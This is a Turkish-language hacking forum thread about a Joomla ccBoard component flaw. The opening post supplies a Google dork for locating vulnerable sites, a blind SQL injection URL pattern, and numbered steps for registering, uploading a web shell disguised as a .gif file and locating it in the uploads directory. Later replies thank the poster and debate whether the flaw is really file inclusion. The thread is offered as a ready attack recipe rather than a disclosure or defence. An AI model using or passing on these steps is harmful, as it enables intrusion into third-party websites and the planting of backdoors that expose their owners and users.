

Joomla Ccboard SQL Injection Ve Shell Yükleme Açığı
-
Joomla CCBoard SQL Injection ve Shell Yükleme Açığı
Google araması : "inurl:option=com_ccboard" 0r "Powered
by ccBoard"Exploit:
blind sql injeksiyon
örnek:index.php?option=com_ccboard&view=postlist&forum=1&topic=[ ]
http://[host]/index.php?option=com_ccboard&view=postlist&forum=1&am
p;topic=-2[Blind SQLi]Nasıl Dosya veya shell upload edeceksiniz ?
1> kayıt sayfasına gidin : http://[host]/index.php?option=com_user&task=register
2> Foruma kaydolun
3> Sonra giriş yapın bir konu açın >>
4> yeni konuyu düznlemeye gelin >
örneğin: :
http://[host]/index.php?option=com_ccboard&view=post&forum=1&to
pic=0&post=0&mode=post&Itemid=53
5> sonra (shell.php.gif) dosyanızı upload edin ve post edin
6> bu düzünden sehlinizi bulun ../components/com_ccboard/assets/uploads/ >
örnet bu şekilde kaydolmuştur :
http://[host]/components/com_ccboard/assets/uploads/62_804ca600ae05e1531b4e
17c78bf1093d.gif -
bura uplanır ve çizilir
-
Dark_Elf bunu yazdı:
-----------------------------
bura uplanır ve çizilir
-----------------------------
Eyvallah. Joomla pluginleri sakat :) -
Ters tepki yaratmasını istemiyorum ancak burdaki olay Sql Incection değil aslında File Inclusion (FI) dir.
Konu yararlı ancak bundan faydalanıcak arkadaşların bu ikisi arasındaki farkı bilmelerinde fayda görüyorum.
Bu konuda pek muhterem arkadaşım nuker'in dökümanlarını kurcalamanızı şiddetle tavsiye ederim. :)
Saygılar...
-
recobaba bunu yazdı:
-----------------------------
Ters tepki yaratmasını istemiyorum ancak burdaki olay Sql Incection değil aslında File Inclusion (FI) dir.
Konu yararlı ancak bundan faydalanıcak arkadaşların bu ikisi arasındaki farkı bilmelerinde fayda görüyorum.
Bu konuda pek muhterem arkadaşım nuker'in dökümanlarını kurcalamanızı şiddetle tavsiye ederim. :)
Saygılar...
-----------------------------multiple hocam hepsinden biraz var :))